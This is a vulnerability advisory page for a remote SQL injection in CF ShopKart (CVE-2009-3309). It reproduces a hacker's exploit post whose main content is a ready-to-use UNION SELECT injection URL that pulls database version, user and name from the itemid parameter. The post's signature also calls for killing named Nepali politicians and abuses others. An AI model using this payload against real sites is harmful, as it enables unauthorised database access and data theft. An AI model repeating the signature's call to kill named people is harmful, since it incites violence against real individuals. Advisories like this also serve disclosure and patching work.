CF Shopkart 5.3x (itemid) Remote SQL Injection Vulnerability

2009.09.23

Credit: learn3r hacker

Risk: High

Local: No

Remote: Yes

CVE: CVE-2009-3309

CWE: CWE-89

Ogólna skala CVSS: 7.5/10

Znaczenie: 6.4/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Częściowy

Wpływ na dostępność: Częściowy

#####################################
#   CF ShopKart SQL vulnerability   #
#   By learn3r hacker from Nepal    #
#     damagicalhacker@gmail.com     #
#####################################

Product name: CF ShopKart
Version: 5.4 beta or may be lower
Product home: www.cfshopkart.com

Affected variable: item

SQLi examples:
http://demo.cfshopkart.com/index.cfm?carttoken=E48384J091709064002&action=ViewDetails&itemid=-928+union+all+select+concat(@@version,user(),database()),2--+

Note that the results of second query are seen in the <title> tag...


Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar

By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!

Referencje:

http://xforce.iss.net/xforce/xfdb/53331

http://www.securityfocus.com/bid/36442

http://www.milw0rm.com/exploits/9710

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CF Shopkart 5.3x (itemid) Remote SQL Injection Vulnerability

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.